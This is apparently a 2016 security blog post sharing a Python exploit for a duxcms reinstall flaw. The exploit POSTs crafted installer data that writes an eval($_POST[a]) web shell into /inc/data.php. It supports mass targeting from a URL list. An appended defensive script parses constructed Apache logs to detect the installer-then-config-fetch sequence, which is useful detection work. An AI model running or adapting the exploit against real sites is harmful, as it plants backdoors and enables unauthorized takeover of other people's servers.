Channel: feelw0rk's Blog - May 2016

{EXP}duxcms getshell


This targets the recently published duxcms reinstall vulnerability plus getshell (this one works regardless of GPC).

Posting the EXP directly. I had meant to write this earlier, got halfway and dropped it; later 胎哥 wrote one as well, with the same idea: just submit the POST data directly. Code below:


import requests
from sys import argv
def getshell():
    ip = argv[2]
    port = argv[4]
    user = argv[6]
    passwd = argv[8]
    data = {"DB_HOST":ip,"DB_PORT":port,"DB_NAME":"duxcms","create":"1","DB_USER":user,"DB_PWD":passwd,"DB_PREFIX":"dc_","spot":"2PL4T_';phpinfo();eval($_POST[a]);echo 'test666123x';#","KEY":"AHT0CALHM0_"}
    if argv[9]=='-u':
        try:
            r = requests.post(argv[10]+'/install/install.php',data=data,timeout=5)
            y = requests.get(argv[10]+'/inc/data.php',timeout=5)
            if ('test666' in y.text):
                print 'shell: ' + y.url + '    pass:a'
            else:
                print "does not exist"
        except:
            print "does not exist"
    elif argv[9]=='-f':
        for i in open(argv[10]).read().split('\n'):
            #print i
            try:
                r = requests.post(i+'/install/install.php',data=data,timeout=5)
                y = requests.get(i+'/inc/data.php',timeout=5)
                if ('test666' in y.text):
                    print 'shell: ' + y.url + '    pass:a'
                else:
                    print "does not exist"

            except:
                pass


if __name__=="__main__":
    if len(argv)<10:
        print '''
        test.py -p 127.0.0.1 -o 3306 -u root -m root -f 1.txt
        test.py -p 127.0.0.1 -o 3306 -u root -m root -u http://127.0.0.1/test/'''
    else :
        getshell()
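From the defender's side, the pattern the post describes leaves a clear trace in the web server log: a POST to /install/install.php on a site that is already installed, followed shortly by a fetch of /inc/data.php from the same client. The script below is an added example (not part of this post and not from the 0xTback/duxcmsexp repository) that parses Apache combined-format access log lines and flags both any hit on the installer and the higher-severity "successful install POST, then config fetch" sequence, plus a trivial check for whether the installer is still present in the document root. The log lines, the 60-second correlation window and the two paths are assumptions taken from the post's request sequence; the sample traffic is constructed.

```python
import os
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2016:10:01:03 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2016:10:01:09 +0800] "POST /install/install.php HTTP/1.1" 200 312 "-" "python-requests/2.9.1"
203.0.113.7 - - [12/May/2016:10:01:10 +0800] "GET /inc/data.php HTTP/1.1" 200 944 "-" "python-requests/2.9.1"
198.51.100.4 - - [12/May/2016:10:05:41 +0800] "GET /install/install.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2016:10:07:02 +0800] "GET /inc/data.php HTTP/1.1" 200 944 "-" "curl/7.47.0"
"""

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Paths from the post; the correlation window is an assumed tuning value.
INSTALLER = "/install/install.php"
CONFIG = "/inc/data.php"
WINDOW = timedelta(seconds=60)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def detect_reinstall_attempts(log_text):
    """Return a list of (finding, ip, method, status) tuples.

    'installer_hit' fires on any request to the installer (it should not be
    reachable on a deployed site at all); 'reinstall_then_config_fetch' fires
    when a client whose POST to the installer returned 200 fetches the config
    file within WINDOW, which is the sequence the post's script performs.
    """
    findings = []
    last_install_post = {}  # ip -> timestamp of the last successful installer POST
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] == INSTALLER:
            findings.append(("installer_hit", rec["ip"], rec["method"], rec["status"]))
            if rec["method"] == "POST" and rec["status"] == 200:
                last_install_post[rec["ip"]] = rec["ts"]
        elif rec["path"] == CONFIG and rec["ip"] in last_install_post:
            if rec["ts"] - last_install_post[rec["ip"]] <= WINDOW:
                findings.append(("reinstall_then_config_fetch", rec["ip"], rec["method"], rec["status"]))
    return findings


def installer_exposed(docroot):
    """True if install/install.php still exists under the given document root.
    The fix the post implies is simply to remove or lock the installer after setup."""
    return os.path.exists(os.path.join(docroot, "install", "install.php"))


if __name__ == "__main__":
    for finding in detect_reinstall_attempts(SAMPLE_LOG):
        print("%-28s ip=%s %s -> %d" % finding)
    print("installer present in ./: %s" % installer_exposed("."))
```

Running it against the constructed log yields three findings: the installer POST from 203.0.113.7, the config fetch from the same address one second later (the sequence that indicates the config file was overwritten), and the 404 probe from 198.51.100.4. The final GET of /inc/data.php from 198.51.100.9 is not flagged because no installer POST preceded it; on a real deployment that file should not be served to clients either, so blocking direct access to inc/ at the web server is the complementary mitigation.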



Git source:

https://github.com/0xTback/duxcmsexp


